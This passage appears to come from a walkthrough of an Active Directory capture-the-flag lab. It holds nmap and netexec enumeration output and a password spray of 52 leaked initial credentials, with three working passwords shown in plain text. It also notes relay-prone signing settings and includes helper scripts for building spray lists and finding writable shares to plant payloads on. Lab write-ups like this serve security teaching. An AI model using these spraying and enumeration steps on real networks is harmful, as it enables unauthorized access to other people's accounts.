| ssl-cert: Subject: commonName=FLYINGDUTCHMAN.PIRATES.BRB
| Not valid before: 2026-01-22T20:58:17
|_Not valid after: 2026-07-24T20:58:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=WIN2022-SRV-X64
| Subject Alternative Name: DNS:WIN2022-SRV-X64, DNS:WIN2022-SRV-X64
| Not valid before: 2025-11-21T05:59:37
|_Not valid after: 2035-11-19T05:59:37
|_ssl-date: TLS randomness does not represent time
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-time:
| date: 2026-01-25T13:51:44
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: FLYINGDUTCHMAN, NetBIOS user: <unknown>, NetBIOS MAC: bc:24:11:ee:a3:ee (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.61 seconds
The box shows ports typically associated with a Windows Client / Server. NetBIOS confirms the hostname FLYINGDUTCHMAN.
All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.
RDP and WinRM are both open should I find creds. SMB could show something unauthenticated, but more likely I’ll need to come back once I have creds.
SMB - TCP 445
Just as with the other hosts, I’m not able to list SMB shares without valid creds on FLYINGDUTCHMAN either:
oxdf@hacky$ netexec smb flyingdutchman.pirates.brb --shares
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.13 445 FLYINGDUTCHMAN [-] Error enumerating shares: [Errno 32] Broken pipe
oxdf@hacky$ netexec smb flyingdutchman.pirates.brb -u guest -p '' --shares
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.13 445 FLYINGDUTCHMAN [-] PIRATES.BRB\guest: STATUS_ACCOUNT_DISABLED
oxdf@hacky$ netexec smb flyingdutchman.pirates.brb -u oxdf -p oxdf --shares
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.13 445 FLYINGDUTCHMAN [-] PIRATES.BRB\oxdf:oxdf STATUS_LOGON_FAILURE
SMB signing is disabled, which means this server would be vulnerable to a relay attack.
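The same signing observation has now come up for every host (SMB on the three member servers, LDAP on the DC). The script below is an added example, not code from the post or from NetExec: it parses the netexec banner lines already shown in this section, pulls out the `(key:value)` fields, and produces a relay-exposure summary of the kind a defender would want from the sweep. The input is a constructed string holding those banner lines; the interpretation of the fields (SMB `signing:True` only when signing is required, LDAP `signing:None` when not enforced) follows what netexec printed above.

```python
import re

# Constructed input: the netexec banner lines from the sweep in this section,
# embedded so the audit runs offline. The real source would be the saved
# stdout of `netexec smb 10.2.10.0/24` and `netexec ldap blackpearl.pirates.brb`.
SAMPLE_OUTPUT = """\
SMB  10.2.10.10  445  BLACKPEARL  [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB  10.2.10.11  445  JOLLYROGER  [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB  10.2.10.12  445  QUEENREV    [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB  10.2.10.13  445  FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
LDAP 10.2.10.10  389  BLACKPEARL  [*] Windows Server 2022 Build 20348 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:None) (channel binding:No TLS cert)
Running nxc against 256 targets ━━━━━━━━━━━ 100% 0:00:00
"""

# "PROTO ip port host [*] ..." prefix of a banner line; other lines are skipped.
BANNER_RE = re.compile(
    r"^(?P<proto>SMB|LDAP)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]")
# Every "(key:value)" field that follows the OS string.
FIELD_RE = re.compile(r"\((?P<key>[^:()]+):(?P<value>[^()]*)\)")


def parse_banners(text: str) -> list:
    """Turn banner lines into dicts with proto, ip, port, host and the parsed fields."""
    findings = []
    for line in text.splitlines():
        m = BANNER_RE.match(line)
        if not m:
            continue
        fields = {k.strip(): v.strip() for k, v in FIELD_RE.findall(line)}
        findings.append({**m.groupdict(), "fields": fields})
    return findings


def relay_exposure(findings: list) -> list:
    """Flag every service that would accept a relayed NTLM authentication."""
    rows = []
    for f in findings:
        signing = f["fields"].get("signing", "")
        if f["proto"] == "SMB":
            # netexec prints signing:True only when the server requires signing.
            exposed = signing != "True"
            reason = "SMB signing not required" if exposed else "SMB signing required"
        else:
            # netexec prints signing:None for LDAP when signing is not enforced.
            exposed = signing == "None"
            reason = "LDAP signing not enforced" if exposed else f"LDAP signing: {signing}"
            cb = f["fields"].get("channel binding")
            if cb:
                reason += f"; channel binding: {cb}"
        rows.append({"host": f["host"], "proto": f["proto"], "port": f["port"],
                     "exposed": exposed, "reason": reason})
    return rows


def exposed_services(text: str) -> list:
    """Sorted 'HOST/PROTO' labels for every exposed service in the output."""
    return sorted(f"{r['host']}/{r['proto']}"
                  for r in relay_exposure(parse_banners(text)) if r["exposed"])


if __name__ == "__main__":
    for r in relay_exposure(parse_banners(SAMPLE_OUTPUT)):
        flag = "EXPOSED" if r["exposed"] else "ok"
        print(f"{r['host']:15} {r['proto']:4} {r['port']:>4}  {flag:8} {r['reason']}")
```

On this lab the report flags the three member servers for SMB and the DC for LDAP; the corresponding fixes are the "Microsoft network server: Digitally sign communications (always)" policy for SMB and LDAP server signing requirements plus channel binding on the DC.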
Initial Credentials
Access Print Jobs
On the JOLLYROGER web page I found the obfuscated admin password. Visiting /scan pops HTTP auth, and the creds work there, showing a page that lists the files:
There are 131 files here! There’s a .htaccess file, but it doesn’t match up with the behavior for /scan:
# Prevent directory listing
Options -Indexes
# Deny access to all files by default
<Files "*">
Order allow,deny
Deny from all
</Files>
# Optional: Custom error page for forbidden access
ErrorDocument 403 "Access denied. Contact IT support for document access."
# Optional: Redirect to main page instead of showing error
# RedirectMatch 403 ^/scan/.*$ /index.html
Perhaps this page is reading from another directory, or maybe something else is configuring the access. nmap identified the server on 8080 as Caddy, which does not process Apache .htaccess files, so this file is most likely a leftover rather than the active configuration.
Based on the file names, the other files consist of:
- 67 PDFs (.pdf)
- 24 Word documents (.docx)
- 29 Excel workbooks (.xlsx)
- 10 PowerPoint presentations (.pptx)
However, the file sizes are all too small to be these document types. When sorted by size, all but one of the docs are less than 175 bytes:
Other than IT_Procedures.docx, the rest are too small to be the format indicated by their extensions. For example, Quality_Standards.docx:
The PDFs don’t open in the browser nicely because it tries to render them as PDFs, but the others open to show the text.
IT_Procedures.docx is also just text, but it’s much longer:
I’ll save a copy. There are initial creds for 52 users on the network:
oxdf@hacky$ cat IT_Procedures.txt | grep Username: | wc -l
52
Credential Check
I’ll create files holding the usernames and passwords:
oxdf@hacky$ cat IT_Procedures.txt | grep Username: | cut -d' ' -f2 > usernames
oxdf@hacky$ cat IT_Procedures.txt | grep Password: | cut -d' ' -f3 > passwords
oxdf@hacky$ wc -l usernames passwords
52 usernames
52 passwords
104 total
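The grep/cut approach above works only because every record in the document has both a Username line and a Password line in the same order, which is also the assumption netexec’s --no-bruteforce makes when it pairs line i of one file with line i of the other. The script below is an added example, not from the post: it contrasts that line-based pairing with a record-aware parser that keeps each password attached to the username that precedes it and reports records with no password instead of shifting every later password onto the wrong user. The document layout (`Username:` / `Initial Password:` lines, matching the cut field numbers above) is an assumption, and the sample text is constructed, with a deliberately incomplete record for jack.

```python
import re

# Constructed sample in the layout the grep/cut commands above imply. The real
# layout of IT_Procedures.docx is an assumption; jack's record is deliberately
# missing its password line to show the failure mode.
SAMPLE_DOC = """\
Onboarding records - initial credentials

Username: blackbeard
Initial Password: TempPass2024!@#

Username: ruby
Initial Password: NewHire789$%^

Username: jack
Note: password to be issued by helpdesk

Username: anne
Initial Password: FirstLogin456#$
"""

USER_RE = re.compile(r"^\s*Username:\s*(\S+)")
PASS_RE = re.compile(r"Password:\s*(\S+)\s*$")


def naive_pairs(text: str) -> list:
    """Reproduce `grep Username: | cut -d' ' -f2` zipped with `grep Password: | cut -d' ' -f3`.

    This is exactly what two separate files fed to netexec with --no-bruteforce
    do: line i of usernames is paired with line i of passwords, regardless of
    which record each line came from.
    """
    users = [line.split()[1] for line in text.splitlines() if "Username:" in line]
    passwords = [line.split()[2] for line in text.splitlines() if "Password:" in line]
    return list(zip(users, passwords))


def parse_records(text: str) -> tuple:
    """Pair each password with the username that precedes it in the document.

    Returns (pairs, incomplete): pairs are (username, password) tuples in document
    order; incomplete lists usernames whose record had no password line.
    """
    pairs, incomplete = [], []
    current = None
    for line in text.splitlines():
        if m := USER_RE.match(line):
            if current is not None:          # previous record never got a password
                incomplete.append(current)
            current = m.group(1)
        elif (m := PASS_RE.search(line)) and current is not None:
            pairs.append((current, m.group(1)))
            current = None
    if current is not None:
        incomplete.append(current)
    return pairs, incomplete


def write_spray_files(pairs: list, users_path: str, passwords_path: str) -> int:
    """Write matched username/password files for `netexec ... --no-bruteforce`."""
    with open(users_path, "w") as uf, open(passwords_path, "w") as pf:
        for user, pw in pairs:
            uf.write(user + "\n")
            pf.write(pw + "\n")
    return len(pairs)


if __name__ == "__main__":
    print("naive line pairing:   ", naive_pairs(SAMPLE_DOC))
    pairs, incomplete = parse_records(SAMPLE_DOC)
    print("record-aware pairing: ", pairs)
    print("records without a password:", incomplete)
    print("wrote", write_spray_files(pairs, "usernames", "passwords"), "matched pairs")
```

With the sample input the naive pairing silently gives jack anne’s password and drops anne entirely, while the record-aware parser returns three correct pairs and names jack as incomplete. A `wc -l` check like the one above only catches this when the counts differ, so the parser is the safer way to build the two files.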
I’ll brute force with netexec to see if any work on the domain:
oxdf@hacky$ netexec smb blackpearl.pirates.brb -u usernames -p passwords --no-bruteforce --continue-on-success
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\blackbeard:TempPass2024!@# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\ruby:NewHire789$%^ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\jack:Welcome123!&* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\anne:FirstLogin456#$ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\longjohn:Initial789@!% STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\calico:Setup321^&* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\oneeye:Begin654$#@ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\sparrow:Start987!@# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\cutlass:Access147*&^ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\hook:Login258%$# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\flint:Password741!@# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\silver:Temp852$%^ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\bones:New963!&* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\compass:Init159#$% STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\cannon:First357@!* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\galleon:Setup486^&$ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\kraken:Begin753*#@ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\treasure:Start642!%^ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\parrot:Access951$@# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\pegleg:Login824&*! STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\rumrunner:Entry573#$% STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\seabiscuit:Pass416!@* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\horizon:Temp792$^& STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\mack:New685!#% STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\seafox:Init348@$* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [+] PIRATES.BRB\barnacle:First927&^!
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\corsair:Setup164$%# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\madeye:Begin583*!@ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\sharktooth:Start739^&# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\sable:Access295$!* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\stormy:Login476#@% STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\ghost:Entry618!^& STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\reef:Pass857$*# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\brine:Temp423@!% STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\captainmorgan:New694^&$ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\blacktail:Init715!#* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\redbeard:First382$%@ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\ironhook:Setup549&!^ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\saltydog:Begin826#$* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\pegasus:Start173!@% STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\rumcutter:Access497^&$ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\stormbreaker:Login635$!# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [+] PIRATES.BRB\plankwalker:Entry284*@&
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\seadog:Pass916!%^ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\reefwalker:Temp548#$@ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\crowsnest:New729&*! STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\stormcloud:Init367$^% STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\harpoon:First894!@# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\cutthroat:Setup152%&* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\lagoon:|oJgt5L>)5vX STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\captainsparrow:Start683^@& STATUS_LOGON_FAILURE
Three still work:
| Username | Password | Department | Access Level |
|---|---|---|---|
| morgan | Entry369@!* | Command Deck | Second Mate |
| barnacle | First927&^! | Trade & Commerce | Port Agent |
| plankwalker | Entry284*@& | Command Deck | Fleet Admiral |
netexec records every successful login in its workspace database, so the three also show up in nxcdb:
nxcdb (pirates.brb) > proto smb
nxcdb (pirates.brb)(smb) > creds
+Credentials---------+-----------+-------------+-------------+-------------+
| CredID | Admin On | CredType | Domain | UserName | Password |
+--------+-----------+-----------+-------------+-------------+-------------+
| 1 | 0 Host(s) | plaintext | PIRATES.BRB | morgan | Entry369@!* |
| 2 | 0 Host(s) | plaintext | PIRATES.BRB | barnacle | First927&^! |
| 3 | 0 Host(s) | plaintext | PIRATES.BRB | plankwalker | Entry284*@& |
+--------+-----------+-----------+-------------+-------------+-------------+
Authenticated Enumeration
SMB
MAQ
A quick check that will be useful later is the Machine Account Quota (the ms-DS-MachineAccountQuota attribute on the domain object). It is the number of computer accounts a single non-privileged domain user is allowed to create; the default is 10:
oxdf@hacky$ netexec ldap blackpearl.pirates.brb -id 1 -M maq
LDAP 10.2.10.10 389 BLACKPEARL [*] Windows Server 2022 Build 20348 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:None) (channel binding:No TLS cert)
LDAP 10.2.10.10 389 BLACKPEARL [+] PIRATES.BRB\morgan:Entry369@!*
MAQ 10.2.10.10 389 BLACKPEARL [*] Getting the MachineAccountQuota
MAQ 10.2.10.10 389 BLACKPEARL MachineAccountQuota: 0
Here it is 0, so standard users can’t add machine accounts to the domain. That rules out the common trick of creating a computer account to serve as the attacker-controlled principal in a delegation (RBCD) attack; any such attack later will have to use an account that already exists.
Shares
For each host, I’ll check the SMB shares available. The banner lines are worth a look too: only BLACKPEARL (the DC) requires SMB signing, and the LDAP banner above showed signing not enforced there either, both of which matter for NTLM relay later:
oxdf@hacky$ netexec smb blackpearl.pirates.brb jollyroger.pirates.brb queenrev.pirates.brb flyingdutchman.pirates.brb -u morgan -p 'Entry369@!*' --shares
SMB 10.2.10.11 445 JOLLYROGER [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.2.10.12 445 QUEENREV [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.11 445 JOLLYROGER [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.13 445 FLYINGDUTCHMAN [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.11 445 JOLLYROGER [*] Enumerated shares
SMB 10.2.10.11 445 JOLLYROGER Share Permissions Remark
SMB 10.2.10.11 445 JOLLYROGER ----- ----------- ------
SMB 10.2.10.11 445 JOLLYROGER ADMIN$ Remote Admin
SMB 10.2.10.11 445 JOLLYROGER C$ Default share
SMB 10.2.10.11 445 JOLLYROGER IPC$ READ Remote IPC
SMB 10.2.10.11 445 JOLLYROGER TREASOR_HUNT Share TREASOR_HUNT
SMB 10.2.10.10 445 BLACKPEARL [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Enumerated shares
SMB 10.2.10.13 445 FLYINGDUTCHMAN Share Permissions Remark
SMB 10.2.10.13 445 FLYINGDUTCHMAN ----- ----------- ------
SMB 10.2.10.13 445 FLYINGDUTCHMAN ADMIN$ Remote Admin
SMB 10.2.10.13 445 FLYINGDUTCHMAN C$ Default share
SMB 10.2.10.13 445 FLYINGDUTCHMAN IPC$ READ Remote IPC
SMB 10.2.10.12 445 QUEENREV [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.12 445 QUEENREV [*] Enumerated shares
SMB 10.2.10.12 445 QUEENREV Share Permissions Remark
SMB 10.2.10.12 445 QUEENREV ----- ----------- ------
SMB 10.2.10.12 445 QUEENREV ADMIN$ Remote Admin
SMB 10.2.10.12 445 QUEENREV C$ Default share
SMB 10.2.10.12 445 QUEENREV IPC$ READ Remote IPC
SMB 10.2.10.12 445 QUEENREV ISLAND2 Island 2 Share
SMB 10.2.10.10 445 BLACKPEARL [*] Enumerated shares
SMB 10.2.10.10 445 BLACKPEARL Share Permissions Remark
SMB 10.2.10.10 445 BLACKPEARL ----- ----------- ------
SMB 10.2.10.10 445 BLACKPEARL ADMIN$ Remote Admin
SMB 10.2.10.10 445 BLACKPEARL C$ Default share
SMB 10.2.10.10 445 BLACKPEARL IPC$ READ Remote IPC
SMB 10.2.10.10 445 BLACKPEARL NETLOGON READ Logon server share
SMB 10.2.10.10 445 BLACKPEARL SYSVOL READ Logon server share
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
I can run the same command with `-id 1`, the CredID of the credential in the current nxcdb workspace, instead of retyping the username and password:
oxdf@hacky$ netexec smb blackpearl.pirates.brb jollyroger.pirates.brb queenrev.pirates.brb flyingdutchman.pirates.brb -id 1 --shares
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.2.10.12 445 QUEENREV [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.11 445 JOLLYROGER [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.10 445 BLACKPEARL [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.12 445 QUEENREV [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.13 445 FLYINGDUTCHMAN [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.12 445 QUEENREV [*] Enumerated shares
SMB 10.2.10.12 445 QUEENREV Share Permissions Remark
SMB 10.2.10.12 445 QUEENREV ----- ----------- ------
SMB 10.2.10.12 445 QUEENREV ADMIN$ Remote Admin
SMB 10.2.10.12 445 QUEENREV C$ Default share
SMB 10.2.10.12 445 QUEENREV IPC$ READ Remote IPC
SMB 10.2.10.12 445 QUEENREV ISLAND2 Island 2 Share
SMB 10.2.10.11 445 JOLLYROGER [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.10 445 BLACKPEARL [*] Enumerated shares
SMB 10.2.10.10 445 BLACKPEARL Share Permissions Remark
SMB 10.2.10.10 445 BLACKPEARL ----- ----------- ------
SMB 10.2.10.10 445 BLACKPEARL ADMIN$ Remote Admin
SMB 10.2.10.10 445 BLACKPEARL C$ Default share
SMB 10.2.10.10 445 BLACKPEARL IPC$ READ Remote IPC
SMB 10.2.10.10 445 BLACKPEARL NETLOGON READ Logon server share
SMB 10.2.10.10 445 BLACKPEARL SYSVOL READ Logon server share
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Enumerated shares
SMB 10.2.10.13 445 FLYINGDUTCHMAN Share Permissions Remark
SMB 10.2.10.13 445 FLYINGDUTCHMAN ----- ----------- ------
SMB 10.2.10.13 445 FLYINGDUTCHMAN ADMIN$ Remote Admin
SMB 10.2.10.13 445 FLYINGDUTCHMAN C$ Default share
SMB 10.2.10.13 445 FLYINGDUTCHMAN IPC$ READ Remote IPC
SMB 10.2.10.11 445 JOLLYROGER [*] Enumerated shares
SMB 10.2.10.11 445 JOLLYROGER Share Permissions Remark
SMB 10.2.10.11 445 JOLLYROGER ----- ----------- ------
SMB 10.2.10.11 445 JOLLYROGER ADMIN$ Remote Admin
SMB 10.2.10.11 445 JOLLYROGER C$ Default share
SMB 10.2.10.11 445 JOLLYROGER IPC$ READ Remote IPC
SMB 10.2.10.11 445 JOLLYROGER TREASOR_HUNT Share TREASOR_HUNT
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
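With four hosts and three credentials the share listings get long, and the lines that matter are the few non-default shares and whether the permission column is filled in. The following is an added example, not part of the original writeup: a small filter that reduces `netexec smb --shares` output to `HOST SHARE PERMS`. The sample lines are constructed from the column layout shown above (the READ,WRITE on TREASOR_HUNT is what barnacle sees, not morgan) so the script runs offline.

```shell
#!/bin/sh
# Added example, not from the original writeup: triage the output of
# `netexec smb <hosts> -u ... -p ... --shares`. The sample below is
# constructed from netexec's column layout as shown in the writeup and
# embedded so the script runs offline.
set -eu

# Constructed sample: two hosts' share tables. netexec prints
#   SMB <ip> <port> <HOST> <share> [<perms>] <remark...>
# and leaves the Permissions column empty when the user has no access,
# so the remark shifts left into field 6. TREASOR_HUNT is shown with the
# READ,WRITE that barnacle gets; ISLAND2 with no access, as morgan sees it.
SAMPLE='SMB 10.2.10.11 445 JOLLYROGER [*] Enumerated shares
SMB 10.2.10.11 445 JOLLYROGER Share Permissions Remark
SMB 10.2.10.11 445 JOLLYROGER ----- ----------- ------
SMB 10.2.10.11 445 JOLLYROGER ADMIN$ Remote Admin
SMB 10.2.10.11 445 JOLLYROGER C$ Default share
SMB 10.2.10.11 445 JOLLYROGER IPC$ READ Remote IPC
SMB 10.2.10.11 445 JOLLYROGER TREASOR_HUNT READ,WRITE Share TREASOR_HUNT
SMB 10.2.10.12 445 QUEENREV [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.12 445 QUEENREV [*] Enumerated shares
SMB 10.2.10.12 445 QUEENREV Share Permissions Remark
SMB 10.2.10.12 445 QUEENREV ----- ----------- ------
SMB 10.2.10.12 445 QUEENREV ADMIN$ Remote Admin
SMB 10.2.10.12 445 QUEENREV C$ Default share
SMB 10.2.10.12 445 QUEENREV IPC$ READ Remote IPC
SMB 10.2.10.12 445 QUEENREV ISLAND2 Island 2 Share'

# stdin: netexec --shares output; stdout: "HOST SHARE PERMS" for every
# share that is not one of the Windows defaults, PERMS being "-" when the
# permission column is empty. The empty-column case is detected by testing
# whether field 6 is one of the values netexec prints there.
nondefault_shares() {
  awk '
    $1 != "SMB" || NF < 5 { next }                 # status/banner lines
    $5 ~ /^\[/ { next }                            # "[*] Enumerated shares", "[+] user:pass"
    $5 == "Share" || $5 == "-----" { next }        # table header
    $5 == "ADMIN$" || $5 == "C$" || $5 == "IPC$" { next }
    $5 == "NETLOGON" || $5 == "SYSVOL" { next }
    {
      perm = "-"
      if (NF >= 6 && $6 ~ /^(READ|WRITE|READ,WRITE)$/) perm = $6
      print $4, $5, perm
    }'
}

# Same, restricted to shares the current user can write to: these are
# the ones worth revisiting for planting files or coercion payloads.
writable_shares() {
  nondefault_shares | awk '$3 ~ /WRITE/'
}

# Usage:
#   netexec smb targets.txt -id 2 --shares | nondefault_shares
#   printf '%s\n' "$SAMPLE" | writable_shares
```

Run it once per credential and diff the results; on this lab the only line that changes between morgan, barnacle and plankwalker is the permission column for TREASOR_HUNT.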
I’ll run the same command with the other two sets of creds, and they see the same shares. The only difference is that barnacle has read and write access to the TREASOR_HUNT share on JOLLYROGER, where morgan had no permissions at all:
SMB 10.2.10.11 445 JOLLYROGER [*] Enumerated shares
SMB 10.2.10.11 445 JOLLYROGER Share Permissions Remark
SMB 10.2.10.1